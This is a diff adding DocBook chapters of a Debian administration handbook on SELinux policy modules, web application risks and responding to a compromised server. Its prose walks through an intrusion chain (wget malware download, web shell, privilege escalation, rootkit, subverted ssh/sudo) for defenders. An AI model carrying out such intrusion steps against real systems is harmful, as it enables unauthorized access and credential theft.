+					<command>semanage user -l</command> lists the mapping between SELinux user identities and allowed roles. Adding a new identity requires to define both the corresponding roles and a labeling prefix which is used to assign a type to personal files (<filename>/home/<replaceable>user</replaceable>/*</filename>). The prefix must be picked among <literal>user</literal>, <literal>staff</literal>, and <literal>sysadm</literal>. The “<literal>staff</literal>” prefix results in files of type “<literal>staff_home_dir_t</literal>”. Creating a new SELinux user identity is done with <command>semanage user -a -R <replaceable>roles</replaceable> -P <replaceable>prefix</replaceable> <replaceable>identity</replaceable></command>. Finally, you can remove an SELinux user identity with <command>semanage user -d <replaceable>identity</replaceable></command>.
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>semanage user -a -R 'staff_r user_r' -P staff test_u</userinput>
+<computeroutput># </computeroutput><userinput>semanage user -l</userinput>
+<computeroutput>
+                Labeling   MLS/       MLS/                          
+SELinux User    Prefix     MCS Level  MCS Range             SELinux Roles
+
+root            sysadm     SystemLow  SystemLow-SystemHigh  staff_r sysadm_r system_r
+staff_u         staff      SystemLow  SystemLow-SystemHigh  staff_r sysadm_r
+sysadm_u        sysadm     SystemLow  SystemLow-SystemHigh  sysadm_r
+system_u        user       SystemLow  SystemLow-SystemHigh  system_r
+test_u          staff      SystemLow  SystemLow             staff_r user_r
+unconfined_u    unconfined SystemLow  SystemLow-SystemHigh  system_r unconfined_r
+user_u          user       SystemLow  SystemLow             user_r
+# </computeroutput><userinput>semanage user -d test_u</userinput></screen>
+
+			</section>
+			 <section>
+				<title>Managing File Contexts, Ports and Booleans</title>
+				 <para>
+					Each SELinux module provides a set of file labeling rules, but it is also possible to add custom labeling rules to cater to a specific case. For example, if you want the web server to be able to read files within the <filename>/srv/www/</filename> file hierarchy, you could execute <command>semanage fcontext -a -t httpd_sys_content_t "/srv/www(/.*)?"</command> followed by <command>restorecon -R /srv/www/</command>. The former command registers the new labeling rules and the latter resets the file types according to the current labeling rules.
+				</para>
+				 <para>
+					Similarly, TCP/UDP ports are labeled in a way that ensures that only the corresponding daemons can listen to them. For instance, if you want the web server to be able to listen on port 8080, you should run <command>semanage port -m -t http_port_t -p tcp 8080</command>.
+				</para>
+				 <para>
+					Some SELinux modules export boolean options that you can tweak to alter the behavior of the default rules. The <command>getsebool</command> utility can be used to inspect those options (<command>getsebool <replaceable>boolean</replaceable></command> displays one option, and <command>getsebool -a</command> them all). The <command>setsebool <replaceable>boolean</replaceable> <replaceable>value</replaceable></command> command changes the current value of a boolean option. The <literal>-P</literal> option makes the change permanent, it means that the new value becomes the default and will be kept across reboots. The example below grants web servers an access to home directories (this is useful when users have personal websites in <filename>~/public_html/</filename>).
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>getsebool httpd_enable_homedirs</userinput>
+<computeroutput>httpd_enable_homedirs --&gt; off
+# </computeroutput><userinput>setsebool -P httpd_enable_homedirs on</userinput>
+<computeroutput># </computeroutput><userinput>getsebool httpd_enable_homedirs</userinput> 
+<computeroutput>httpd_enable_homedirs --&gt; on</computeroutput></screen>
+
+			</section>
+
+		</section>
+		 <section id="sect.selinux-custom-rules">
+			<title>Adapting the Rules</title>
+			 <para>
+				Since the SELinux policy is modular, it might be interesting to develop new modules for (possibly custom) applications that lack them. These new modules will then complete the <emphasis>reference policy</emphasis>.
+			</para>
+			 <para>
+				To create new modules, the <emphasis role="pkg">selinux-policy-dev</emphasis> package is required, as well as <emphasis role="pkg">selinux-policy-doc</emphasis>. The latter contains the documentation of the standard rules (<filename>/usr/share/doc/selinux-policy-doc/html/</filename>) and sample files that can be used as templates to create new modules. Install those files and study them more closely:
+			</para>
+			 
+<screen><computeroutput>$ </computeroutput><userinput>cp /usr/share/doc/selinux-policy-doc/Makefile.example Makefile</userinput>
+<computeroutput>$ </computeroutput><userinput>cp /usr/share/doc/selinux-policy-doc/example.fc ./</userinput>
+<computeroutput>$ </computeroutput><userinput>cp /usr/share/doc/selinux-policy-doc/example.if ./</userinput>
+<computeroutput>$ </computeroutput><userinput>cp /usr/share/doc/selinux-policy-doc/example.te ./</userinput></screen>
+			 <para>
+				The <filename>.te</filename> file is the most important one. It defines the rules. The <filename>.fc</filename> file defines the “file contexts”, that is the types assigned to files related to this module. The data within the <filename>.fc</filename> file are used during the file labeling step. Finally, the <filename>.if</filename> file defines the interface of the module: it is a set of “public functions” that other modules can use to properly interact with the module that you're creating.
+			</para>
+			 <section>
+				<title>Writing a <filename>.fc</filename> file</title>
+				 <para>
+					Reading the below example should be sufficient to understand the structure of such a file. You can use regular expressions to assign the same security context to multiple files, or even an entire directory tree.
+				</para>
+				 <example>
+					<title><filename>example.fc</filename> file</title>
+					 
+<programlisting role="scale"># myapp executable will have:
+# label: system_u:object_r:myapp_exec_t
+# MLS sensitivity: s0
+# MCS categories: &lt;none&gt;
+
+/usr/sbin/myapp         --      gen_context(system_u:object_r:myapp_exec_t,s0)
+</programlisting>
+
+				</example>
+
+			</section>
+			 <section>
+				<title>Writing a <filename>.if</filename> File</title>
+				 <para>
+					In the sample below, the first interface (“<literal>myapp_domtrans</literal>”) controls who can execute the application. The second one (“<literal>myapp_read_log</literal>”) grants read rights on the application's log files.
+				</para>
+				 <para>
+					Each interface must generate a valid set of rules which can be embedded in a <filename>.te</filename> file. You should thus declare all the types that you use (with the <literal>gen_require</literal> macro), and use standard directives to grant rights. Note, however, that you can use interfaces provided by other modules. The next section will give more explanations about how to express those rights.
+				</para>
+				 <example>
+					<title><filename>example.if</filename> File</title>
+					 
+<programlisting>## &lt;summary&gt;Myapp example policy&lt;/summary&gt;
+## &lt;desc&gt;
+##      &lt;p&gt;
+##              More descriptive text about myapp.  The &lt;desc&gt;
+##              tag can also use &lt;p&gt;, &lt;ul&gt;, and &lt;ol&gt;
+##              html tags for formatting.
+##      &lt;/p&gt;
+##      &lt;p&gt;
+##              This policy supports the following myapp features:
+##              &lt;ul&gt;
+##              &lt;li&gt;Feature A&lt;/li&gt;
+##              &lt;li&gt;Feature B&lt;/li&gt;
+##              &lt;li&gt;Feature C&lt;/li&gt;
+##              &lt;/ul&gt;
+##      &lt;/p&gt;
+## &lt;/desc&gt;
+#
+
+########################################
+## &lt;summary&gt;
+##      Execute a domain transition to run myapp.
+## &lt;/summary&gt;
+## &lt;param name="domain"&gt;
+##      Domain allowed to transition.
+## &lt;/param&gt;
+#
+interface(`myapp_domtrans',`
+        gen_require(`
+                type myapp_t, myapp_exec_t;
+        ')
+
+        domtrans_pattern($1,myapp_exec_t,myapp_t)
+')
+
+########################################
+## &lt;summary&gt;
+##      Read myapp log files.
+## &lt;/summary&gt;
+## &lt;param name="domain"&gt;
+##      Domain allowed to read the log files.
+## &lt;/param&gt;
+#
+interface(`myapp_read_log',`
+        gen_require(`
+                type myapp_log_t;
+        ')
+
+        logging_search_logs($1)
+        allow $1 myapp_log_t:file r_file_perms;
+')
+</programlisting>
+
+				</example>
+				 <sidebar> <title><emphasis>DOCUMENTATION</emphasis> Explanations about the <emphasis>reference policy</emphasis></title>
+				 <para>
+					The <emphasis>reference policy</emphasis> evolves like any free software project: based on volunteer contributions. The project is hosted by Tresys, one of the most active companies in the SELinux field. Their wiki contains explanations on how the rules are structured and how you can create new ones. <ulink type="block" url="https://github.com/TresysTechnology/refpolicy/wiki/GettingStarted" />
+				</para>
+				 </sidebar>
+			</section>
+			 <section id="sect.writing-a-te-file">
+				<title>Writing a <filename>.te</filename> File</title>
+				 <para>
+					Have a look at the <filename>example.te</filename> file:
+				</para>
+				 <sidebar> <title><emphasis>GOING FURTHER</emphasis> The <command>m4</command> macro language</title>
+				 <para>
+					To properly structure the policy, the SELinux developers used a macro-command processor. Instead of duplicating many similar <emphasis>allow</emphasis> directives, they created “macro functions” to use a higher-level logic, which also results in a much more readable policy.
+				</para>
+				 <para>
+					In practice, <command>m4</command> is used to compile those rules. It does the opposite operation: it expands all those high-level directives into a huge database of <emphasis>allow</emphasis> directives.
+				</para>
+				 <para>
+					The SELinux “interfaces” are only macro functions which will be substituted by a set of rules at compilation time. Likewise, some rights are in fact sets of rights which are replaced by their values at compilation time.
+				</para>
+				 </sidebar> 
+<programlisting>policy_module(myapp,1.0.0) <co id="example.te.module"></co>
+
+########################################
+#
+# Declarations
+#
+
+type myapp_t; <co id="example.te.type"></co>
+type myapp_exec_t;
+domain_type(myapp_t)
+domain_entry_file(myapp_t, myapp_exec_t) <co id="example.te.domain"></co>
+
+type myapp_log_t;
+logging_log_file(myapp_log_t) <co id="example.te.interface"></co>
+
+type myapp_tmp_t;
+files_tmp_file(myapp_tmp_t)
+
+########################################
+#
+# Myapp local policy
+#
+
+allow myapp_t myapp_log_t:file { read_file_perms append_file_perms }; <co id="example.te.allow"></co>
+
+allow myapp_t myapp_tmp_t:file manage_file_perms;
+files_tmp_filetrans(myapp_t,myapp_tmp_t,file)
+</programlisting>
+				 <calloutlist>
+					<callout arearefs="example.te.module">
+						<para>
+							The module must be identified by its name and version number. This directive is required.
+						</para>
+
+					</callout>
+					 <callout arearefs="example.te.type">
+						<para>
+							If the module introduces new types, it must declare them with directives like this one. Do not hesitate to create as many types as required rather than granting too many useless rights.
+						</para>
+
+					</callout>
+					 <callout arearefs="example.te.domain">
+						<para>
+							Those interfaces define the <literal>myapp_t</literal> type as a process domain that should be used by any executable labeled with <literal>myapp_exec_t</literal>. Implicitly, this adds an <literal>exec_type</literal> attribute on those objects, which in turn allows other modules to grant rights to execute those programs: for instance, the <literal>userdomain</literal> module allows processes with domains <literal>user_t</literal>, <literal>staff_t</literal>, and <literal>sysadm_t</literal> to execute them. The domains of other confined applications will not have the rights to execute them, unless the rules grant them similar rights (this is the case, for example, of <command>dpkg</command> with its <literal>dpkg_t</literal> domain).
+						</para>
+
+					</callout>
+					 <callout arearefs="example.te.interface">
+						<para>
+							<literal>logging_log_file</literal> is an interface provided by the reference policy. It indicates that files labeled with the given type are log files which ought to benefit from the associated rules (for example granting rights to <command>logrotate</command> so that it can manipulate them).
+						</para>
+
+					</callout>
+					 <callout arearefs="example.te.allow">
+						<para>
+							The <literal>allow</literal> directive is the base directive used to authorize an operation. The first parameter is the process domain which is allowed to execute the operation. The second one defines the object that a process of the former domain can manipulate. This parameter is of the form “<replaceable>type</replaceable>:<replaceable>class</replaceable>“ where <replaceable>type</replaceable> is its SELinux type and <replaceable>class</replaceable> describes the nature of the object (file, directory, socket, fifo, etc.). Finally, the last parameter describes the permissions (the allowed operations).
+						</para>
+						 <para>
+							Permissions are defined as the set of allowed operations and follow this template: <literal>{ <replaceable>operation1</replaceable> <replaceable>operation2</replaceable> }</literal>. However, you can also use macros representing the most useful permissions. The <filename>/usr/share/selinux/devel/include/support/obj_perm_sets.spt</filename> lists them.
+						</para>
+						 <para>
+							The following web page provides a relatively exhaustive list of object classes, and permissions that can be granted. <ulink type="block" url="http://www.selinuxproject.org/page/ObjectClassesPerms" />
+						</para>
+
+					</callout>
+
+				</calloutlist>
+				 <para>
+					Now you just have to find the minimal set of rules required to ensure that the target application or service works properly. To achieve this, you should have a good knowledge of how the application works and of what kind of data it manages and/or generates.
+				</para>
+				 <para>
+					However, an empirical approach is possible. Once the relevant objects are correctly labeled, you can use the application in permissive mode: the operations that would be forbidden are logged but still succeed. By analyzing the logs, you can now identify the operations to allow. Here is an example of such a log entry:
+				</para>
+				 
+<programlisting>avc:  denied  { read write } for  pid=1876 comm="syslogd" name="xconsole" dev=tmpfs ino=5510 scontext=system_u:system_r:syslogd_t:s0 tcontext=system_u:object_r:device_t:s0 tclass=fifo_file permissive=1
+</programlisting>
+				 <para>
+					To better understand this message, let us study it piece by piece.
+				</para>
+				 <table colsep="1">
+					<title>Analysis of an SELinux trace</title>
+					 <tgroup cols="2">
+						<thead>
+							<row>
+								<entry>Message</entry>
+								 <entry>Description</entry>
+
+							</row>
+
+						</thead>
+						 <tbody>
+							<row>
+								<entry> <computeroutput>avc: denied</computeroutput> </entry>
+								 <entry>An operation has been denied.</entry>
+
+							</row>
+							 <row>
+								<entry> <computeroutput>{ read write }</computeroutput> </entry>
+								 <entry>This operation required the <literal>read</literal> and <literal>write</literal> permissions.</entry>
+
+							</row>
+							 <row>
+								<entry> <computeroutput>pid=1876</computeroutput> </entry>
+								 <entry>The process with PID 1876 executed the operation (or tried to execute it).</entry>
+
+							</row>
+							 <row>
+								<entry> <computeroutput>comm="syslogd"</computeroutput> </entry>
+								 <entry>The process was an instance of the <literal>syslogd</literal> program.</entry>
+
+							</row>
+							 <row>
+								<entry> <computeroutput>name="xconsole"</computeroutput> </entry>
+								 <entry>The target object was named <literal>xconsole</literal>. Sometimes you can also have a “path” variable — with the full path — instead.</entry>
+
+							</row>
+							 <row>
+								<entry> <computeroutput>dev=tmpfs</computeroutput> </entry>
+								 <entry>The device hosting the target object is a <literal>tmpfs</literal> (an in-memory filesystem). For a real disk, you could see the partition hosting the object (for example: “sda3”).</entry>
+
+							</row>
+							 <row>
+								<entry> <computeroutput>ino=5510</computeroutput> </entry>
+								 <entry>The object is identified by the inode number 5510.</entry>
+
+							</row>
+							 <row>
+								<entry> <computeroutput>scontext=system_u:system_r:syslogd_t:s0</computeroutput> </entry>
+								 <entry>This is the security context of the process who executed the operation.</entry>
+
+							</row>
+							 <row>
+								<entry> <computeroutput>tcontext=system_u:object_r:device_t:s0</computeroutput> </entry>
+								 <entry>This is the security context of the target object.</entry>
+
+							</row>
+							 <row>
+								<entry> <computeroutput>tclass=fifo_file</computeroutput> </entry>
+								 <entry>The target object is a FIFO file.</entry>
+
+							</row>
+
+						</tbody>
+
+					</tgroup>
+
+				</table>
+				 <para>
+					By observing this log entry, it is possible to build a rule that would allow this operation. For example: <literal>allow syslogd_t device_t:fifo_file { read write }</literal>. This process can be automated, and it's exactly what the <command>audit2allow</command> command (of the <emphasis role="pkg">policycoreutils</emphasis> package) offers. This approach is only useful if the various objects are already correctly labeled according to what must be confined. In any case, you will have to carefully review the generated rules and validate them according to your knowledge of the application. Effectively, this approach tends to grant more rights than are really required. The proper solution is often to create new types and to grant rights on those types only. It also happens that a denied operation isn't fatal to the application, in which case it might be better to just add a “<literal>dontaudit</literal>” rule to avoid the log entry despite the effective denial.
+				</para>
+				 <sidebar> <title><emphasis>COMPLEMENTS</emphasis> No roles in policy rules</title>
+				 <indexterm>
+					<primary>Type Enforcement</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>Enforcement, Type Enforcement</primary>
+				</indexterm>
+				 <para>
+					It might seem weird that roles do not appear at all when creating new rules. SELinux uses only the domains to find out which operations are allowed. The role intervenes only indirectly by allowing the user to switch to another domain. SELinux is based on a theory known as <emphasis>Type Enforcement</emphasis> and the type is the only element that matters when granting rights.
+				</para>
+				 </sidebar>
+			</section>
+			 <section>
+				<title>Compiling the Files</title>
+				 <para>
+					Once the 3 files (<filename>example.if</filename>, <filename>example.fc</filename>, and <filename>example.te</filename>) match your expectations for the new rules, just run <command>make NAME=devel</command> to generate a module in the <filename>example.pp</filename> file (you can immediately load it with <command>semodule -i example.pp</command>). If several modules are defined, <command>make</command> will create all the corresponding <filename>.pp</filename> files.
+				</para>
+
+			</section>
+
+		</section>
+
+	</section>
+	 <section id="sect.other-security-considerations">
+		<title>Other Security-Related Considerations</title>
+		 <para>
+			Security is not just a technical problem; more than anything, it is about good practices and understanding the risks. This section reviews some of the more common risks, as well as a few best practices which should, depending on the case, increase security or lessen the impact of a successful attack.
+		</para>
+		 <section>
+			<title>Inherent Risks of Web Applications</title>
+			 <para>
+				The universal character of web applications led to their proliferation. Several are often run in parallel: a webmail, a wiki, some groupware system, forums, a photo gallery, a blog, and so on. Many of those applications rely on the “LAMP” (<emphasis>Linux, Apache, MySQL, PHP</emphasis>) stack. Unfortunately, many of those applications were also written without much consideration for security problems. Data coming from outside is, too often, used with little or no validation. Providing specially-crafted values can be used to subvert a call to a command so that another one is executed instead. Many of the most obvious problems have been fixed as time has passed, but new security problems pop up regularly.
+			</para>
+			 <sidebar> <title><emphasis>VOCABULARY</emphasis> SQL injection</title>
+			 <para>
+				When a program inserts data into SQL queries in an insecure manner, it becomes vulnerable to SQL injections; this name covers the act of changing a parameter in such a way that the actual query executed by the program is different from the intended one, either to damage the database or to access data that should normally not be accessible. <ulink type="block" url="http://en.wikipedia.org/wiki/SQL_Injection" />
+			</para>
+			 <indexterm>
+				<primary>SQL injection</primary>
+			</indexterm>
+			 </sidebar> <para>
+				Updating web applications regularly is therefore a must, lest any cracker (whether a professional attacker or a script kiddy) can exploit a known vulnerability. The actual risk depends on the case, and ranges from data destruction to arbitrary code execution, including web site defacement.
+			</para>
+
+		</section>
+		 <section>
+			<title>Knowing What To Expect</title>
+			 <para>
+				A vulnerability in a web application is often used as a starting point for cracking attempts. What follows is a short review of possible consequences.
+			</para>
+			 <sidebar> <title><emphasis>QUICK LOOK</emphasis> Filtering HTTP queries</title>
+			 <para>
+				Apache 2 includes modules allowing filtering incoming HTTP queries. This allows blocking some attack vectors. For instance, limiting the length of parameters can prevent buffer overflows. More generally, one can validate parameters before they are even passed to the web application and restrict access along many criteria. This can even be combined with dynamic firewall updates, so that a client infringing one of the rules is banned from accessing the web server for a given period of time.
+			</para>
+			 <para>
+				Setting up these checks can be a long and cumbersome task, but it can pay off when the web application to be deployed has a dubious track record where security is concerned.
+			</para>
+			 <para>
+				<emphasis>mod-security2</emphasis> (in the <emphasis role="pkg">libapache2-mod-security2</emphasis> package) is the main such module. It even comes with many ready-to-use rules of its own (in the <emphasis role="pkg">modsecurity-crs</emphasis> package) that you can easily enable.
+			</para>
+			 <indexterm>
+				<primary><emphasis role="pkg">libapache-mod-security</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis>mod-security</emphasis></primary>
+			</indexterm>
+			 </sidebar> <para>
+				The consequences of an intrusion will have various levels of obviousness depending on the motivations of the attacker. <emphasis>Script-kiddies</emphasis> only apply recipes they find on web sites; most often, they deface a web page or delete data. In more subtle cases, they add invisible contents to web pages so as to improve referrals to their own sites in search engines.
+			</para>
+			 <para>
+				A more advanced attacker will go beyond that. A disaster scenario could go on in the following fashion: the attacker gains the ability to execute commands as the <literal>www-data</literal> user, but executing a command requires many manipulations. To make their life easier, they install other web applications specially designed to remotely execute many kinds of commands, such as browsing the filesystem, examining permissions, uploading or downloading files, executing commands, and even provide a network shell. Often, the vulnerability will allow running a <command>wget</command> command that will download some malware into <filename>/tmp/</filename>, then executing it. The malware is often downloaded from a foreign website that was previously compromised, in order to cover tracks and make it harder to find out the actual origin of the attack.
+			</para>
+			 <para>
+				At this point, the attacker has enough freedom of movement that they often install an IRC <emphasis>bot</emphasis> (a robot that connects to an IRC server and can be controlled by this channel). This bot is often used to share illegal files (unauthorized copies of movies or software, and so on). A determined attacker may want to go even further. The <literal>www-data</literal> account does not allow full access to the machine, and the attacker will try to obtain administrator privileges. Now, this should not be possible, but if the web application was not up-to-date, chances are that the kernel and other programs are outdated too; this sometimes follows a decision from the administrator who, despite knowing about the vulnerability, neglected to upgrade the system since there are no local users. The attacker can then take advantage of this second vulnerability to get root access.
+			</para>
+			 <sidebar> <title><emphasis>VOCABULARY</emphasis> Privilege escalation</title>
+			 <para>
+				This term covers anything that can be used to obtain more permissions than a given user should normally have. The <command>sudo</command> program is designed for precisely the purpose of giving administrative rights to some users. But the same term is also used to describe the act of an attacker exploiting a vulnerability to obtain undue rights.
+			</para>
+			 </sidebar> <para>
+				Now the attacker owns the machine; they will usually try to keep this privileged access for as long as possible. This involves installing a <emphasis>rootkit</emphasis>, a program that will replace some components of the system so that the attacker will be able to obtain the administrator privileges again at a later time; the rootkit also tries hiding its own existence as well as any traces of the intrusion. A subverted <command>ps</command> program will omit to list some processes, <command>netstat</command> will not list some of the active connections, and so on. Using the root permissions, the attacker was able to observe the whole system, but didn't find important data; so they will try accessing other machines in the corporate network. Analyzing the administrator's account and the history files, the attacker finds what machines are routinely accessed. By replacing <command>sudo</command> or <command>ssh</command> with a subverted program, the attacker can intercept some of the administrator's passwords, which they will use on the detected servers… and the intrusion can propagate from then on.
+			</para>
+			 <para>
+				This is a nightmare scenario which can be prevented by several measures. The next few sections describe some of these measures.
+			</para>
+
+		</section>
+		 <section id="sect.choosing-the-software-wisely">
+			<title>Choosing the Software Wisely</title>
+			 <para>
+				Once the potential security problems are known, they must be taken into account at each step of the process of deploying a service, especially when choosing the software to install. Many web sites, such as <literal>SecurityFocus.com</literal>, keep a list of recently-discovered vulnerabilities, which can give an idea of a security track record before some particular software is deployed. Of course, this information must be balanced against the popularity of said software: a more widely-used program is a more tempting target, and it will be more closely scrutinized as a consequence. On the other hand, a niche program may be full of security holes that never get publicized due to a lack of interest in a security audit.
+			</para>
+			 <sidebar> <title><emphasis>VOCABULARY</emphasis> Security audit</title>
+			 <para>
+				A security audit is the process of thoroughly reading and analyzing the source code of some software, looking for potential security vulnerabilities it could contain. Such audits are usually proactive and they are conducted to ensure a program meets certain security requirements.
+			</para>
+			 </sidebar> <para>
+				In the Free Software world, there is generally ample room for choice, and choosing one piece of software over another should be a decision based on the criteria that apply locally. More features imply an increased risk of a vulnerability hiding in the code; picking the most advanced program for a task may actually be counter-productive, and a better approach is usually to pick the simplest program that meets the requirements.
+			</para>
+			 <sidebar> <title><emphasis>VOCABULARY</emphasis> Zero-day exploit</title>
+			 <para>
+				A <emphasis>zero-day exploit</emphasis> attack is hard to prevent; the term covers a vulnerability that is not yet known to the authors of the program.
+			</para>
+			 </sidebar>
+		</section>
+		 <section id="sect.managing-a-machine-as-a-whole">
+			<title>Managing a Machine as a Whole</title>
+			 <para>
+				Most Linux distributions install by default a number of Unix services and many tools. In many cases, these services and tools are not required for the actual purposes for which the administrator set up the machine. As a general guideline in security matters, unneeded software is best uninstalled. Indeed, there is no point in securing an FTP server, if a vulnerability in a different, unused service can be used to get administrator privileges on the whole machine.
+			</para>
+			 <para>
+				By the same reasoning, firewalls will often be configured to only allow access to services that are meant to be publicly accessible.
+			</para>
+			 <para>
+				Current computers are powerful enough to allow hosting several services on the same physical machine. From an economic viewpoint, such a possibility is interesting: only one computer to administrate, lower energy consumption, and so on. From the security point of view, however, such a choice can be a problem. One compromised service can bring access to the whole machine, which in turn compromises the other services hosted on the same computer. This risk can be mitigated by isolating the services. This can be attained either with virtualization (each service being hosted in a dedicated virtual machine or container), or with AppArmor/SELinux (each service daemon having an adequately designed set of permissions).
+			</para>
+
+		</section>
+		 <section id="sect.users-are-players">
+			<title>Users Are Players</title>
+			 <para>
+				Discussing security immediately brings to mind protection against attacks by anonymous crackers hiding in the Internet jungle; but an often-forgotten fact is that risks also come from inside: an employee about to leave the company could download sensitive files on the important projects and sell them to competitors, a negligent salesman could leave their desk without locking their session during a meeting with a new prospect, a clumsy user could delete the wrong directory by mistake, and so on.
+			</para>
+			 <para>
+				The response to these risks can involve technical solutions: no more than the required permissions should be granted to users, and regular backups are a must. But in many cases, the appropriate protection is going to involve training users to avoid the risks.
+			</para>
+			 <sidebar> <title><emphasis>QUICK LOOK</emphasis> <emphasis role="pkg">autolog</emphasis></title>
+			 <para>
+				The <emphasis role="pkg">autolog</emphasis> package provides a program that automatically disconnects inactive users after a configurable delay. It also allows killing user processes that persist after a session ends, thereby preventing users from running daemons.
+			</para>
+			 </sidebar>
+		</section>
+		 <section id="sect.physical-security">
+			<title>Physical Security</title>
+			 <para>
+				There is no point in securing the services and networks if the computers themselves are not protected. Important data deserve being stored on hot-swappable hard disks in RAID arrays, because hard disks fail eventually and data availability is a must. But if any pizza delivery boy can enter the building, sneak into the server room and run away with a few selected hard disks, an important part of security is not fulfilled. Who can enter the server room? Is access monitored? These questions deserve consideration (and an answer) when physical security is being evaluated.
+			</para>
+			 <para>
+				Physical security also includes taking into consideration the risks for accidents such as fires. This particular risk is what justifies storing the backup media in a separate building, or at least in a fire-proof strongbox.
+			</para>
+
+		</section>
+		 <section>
+			<title>Legal Liability</title>
+			 <para>
+				An administrator is, more or less implicitly, trusted by their users as well as the users of the network in general. They should therefore avoid any negligence that malevolent people could exploit.
+			</para>
+			 <para>
+				An attacker taking control of your machine then using it as a forward base (known as a “relay system”) from which to perform other nefarious activities could cause legal trouble for you, since the attacked party would initially see the attack coming from your system, and therefore consider you as the attacker (or as an accomplice). In many cases, the attacker will use your server as a relay to send spam, which shouldn't have much impact (except potentially registration on black lists that could restrict your ability to send legitimate emails), but won't be pleasant nevertheless. In other cases, more important trouble can be caused from your machine, for instance denial of service attacks. This will sometimes induce loss of revenue, since the legitimate services will be unavailable and data can be destroyed; sometimes this will also imply a real cost, because the attacked party can start legal proceedings against you. Rights-holders can sue you if an unauthorized copy of a work protected by copyright law is shared from your server, as well as other companies compelled by service level agreements if they are bound to pay penalties following the attack from your machine.
+			</para>
+			 <para>
+				When these situations occur, claiming innocence is not usually enough; at the very least, you will need convincing evidence showing suspect activity on your system coming from a given IP address. This won't be possible if you neglect the recommendations of this chapter and let the attacker obtain access to a privileged account (root, in particular) and use it to cover their tracks.
+			</para>
+
+		</section>
+
+	</section>
+	 <section id="sect.dealing-with-compromised-machine">
+		<title>Dealing with a Compromised Machine</title>
+		 <para>
+			Despite the best intentions and however carefully designed the security policy, an administrator eventually faces an act of hijacking. This section provides a few guidelines on how to react when confronted with these unfortunate circumstances.
+		</para>
+		 <section>
+			<title>Detecting and Seeing the Cracker's Intrusion</title>
+			 <para>
+				The first step of reacting to cracking is to be aware of such an act. This is not self-evident, especially without an adequate monitoring infrastructure.
+			</para>
+			 <para>
+				Cracking acts are often not detected until they have direct consequences on the legitimate services hosted on the machine, such as connections slowing down, some users being unable to connect, or any other kind of malfunction. Faced with these problems, the administrator needs to have a good look at the machine and carefully scrutinize what misbehaves. This is usually the time when they discover an unusual process, for instance one named <literal>apache</literal> instead of the standard <literal>/usr/sbin/apache2</literal>. If we follow that example, the thing to do is to note its process identifier, and check <filename>/proc/<replaceable>pid</replaceable>/exe</filename> to see what program this process is currently running:
+			</para>
+			 
+<screen>
+<computeroutput># </computeroutput><userinput>ls -al /proc/3719/exe</userinput>
+<computeroutput>lrwxrwxrwx 1 www-data www-data 0 2007-04-20 16:19 /proc/3719/exe -&gt; /var/tmp/.bash_httpd/psybnc</computeroutput>
+</screen>
+			 <para>
+				A program installed under <filename>/var/tmp/</filename> and running as the web server? No doubt left, the machine is compromised.
+			</para>
+			 <para>
+				This is only one example, but many other hints can ring the administrator's bell:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						an option to a command that no longer works; the version of the software that the command claims to be doesn't match the version that is supposed to be installed according to <command>dpkg</command>;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						a command prompt or a session greeting indicating that the last connection came from an unknown server on another continent;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						errors caused by the <filename>/tmp/</filename> partition being full, which turned out to be full of illegal copies of movies;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						and so on.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+
+		</section>
+		 <section>
+			<title>Putting the Server Off-Line</title>
+			 <para>
+				In any but the most exotic cases, the cracking comes from the network, and the attacker needs a working network to reach their targets (access confidential data, share illegal files, hide their identity by using the machine as a relay, and so on). Unplugging the computer from the network will prevent the attacker from reaching these targets, if they haven't managed to do so yet.
+			</para>
+			 <para>
+				This may only be possible if the server is physically accessible. When the server is hosted in a hosting provider's data center halfway across the country, or if the server is not accessible for any other reason, it's usually a good idea to start by gathering some important information (see <xref linkend="sect.keeping-everything-that-could-be-used-as-evidence" />, <xref linkend="sect.forensic-analysis" /> and <xref linkend="sect.reconstituting-the-attack-scenario" />), then isolating that server as much as possible by shutting down as many services as possible (usually, everything but <command>sshd</command>). This case is still awkward, since one can't rule out the possibility of the attacker having SSH access like the administrator has; this makes it harder to “clean” the machines.
+			</para>
+
+		</section>
+		 <section id="sect.keeping-everything-that-could-be-used-as-evidence">
+			<title>Keeping Everything that Could Be Used as Evidence</title>
+			 <para>
+				Understanding the attack and/or engaging legal action against the attackers requires taking copies of all the important elements; this includes the contents of the hard disk, a list of all running processes, and a list of all open connections. The contents of the RAM could also be used, but it is rarely used in practice.
+			</para>
+			 <para>
+				In the heat of action, administrators are often tempted to perform many checks on the compromised machine; this is usually not a good idea. Every command is potentially subverted and can erase pieces of evidence. The checks should be restricted to the minimal set (<command>netstat -tupan</command> for network connections, <command>ps auxf</command> for a list of processes, <command>ls -alR /proc/[0-9]*</command> for a little more information on running programs), and every performed check should carefully be written down.
+			</para>
+			 <sidebar> <title><emphasis>CAUTION</emphasis> Hot analysis</title>
+			 <para>
+				While it may seem tempting to analyze the system as it runs, especially when the server is not physically reachable, this is best avoided: quite simply you can't trust the programs currently installed on the compromised system. It's quite possible for a subverted <command>ps</command> command to hide some processes, or for a subverted <command>ls</command> to hide files; sometimes even the kernel is compromised!
+			</para>
+			 <para>
+				If such a hot analysis is still required, care should be taken to only use known-good programs. A good way to do that would be to have a rescue CD with pristine programs, or a read-only network share. However, even those countermeasures may not be enough if the kernel itself is compromised.
+			</para>
+			 </sidebar> <para>
+				Once the “dynamic” elements have been saved, the next step is to store a complete image of the hard-disk. Making such an image is impossible if the filesystem is still evolving, which is why it must be remounted read-only. The simplest solution is often to halt the server brutally (after running <command>sync</command>) and reboot it on a rescue CD. Each partition should be copied with a tool such as <command>dd</command>; these images can be sent to another server (possibly with the very convenient <command>nc</command> tool). Another possibility may be even simpler: just get the disk out of the machine and replace it with a new one that can be reformatted and reinstalled.
+			</para>
+
+		</section>
+		 <section>
+			<title>Re-installing</title>
+			 <indexterm>
+				<primary>backdoor</primary>
+			</indexterm>
+			 <para>
